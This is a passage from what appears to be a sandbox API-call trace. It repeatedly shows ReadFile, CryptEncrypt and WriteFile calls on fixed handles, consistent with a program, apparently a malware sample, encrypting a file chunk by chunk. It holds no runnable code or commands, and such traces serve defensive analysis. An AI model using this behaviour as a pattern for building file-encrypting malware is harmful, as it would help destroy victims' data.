nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.970] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.970] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.970] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.970] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.970] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.970] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.970] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.970] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.970] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.970] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.970] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.971] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.971] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.971] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.971] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.971] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.971] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.971] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.971] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.971] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.971] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.971] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.971] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.971] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.972] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.972] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.972] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.972] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.972] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.972] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.972] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.972] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.972] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.972] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.972] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.972] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.972] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.973] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.973] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.973] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.973] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.973] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.973] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.973] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.973] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.973] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.973] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.973] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.974] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.974] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.974] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.974] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.974] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.974] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.974] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.974] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.974] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.974] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.974] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.975] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.975] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.975] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.975] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.975] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.975] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.975] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.975] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.975] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.975] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.975] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.975] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.976] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.976] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.976] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.976] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.976] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.976] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.976] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.976] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.976] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.976] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.976] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.976] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.976] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.977] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.977] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.977] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.977] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.977] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.977] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.977] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.977] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.977] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.977] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.977] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.977] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.978] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.978] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.978] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 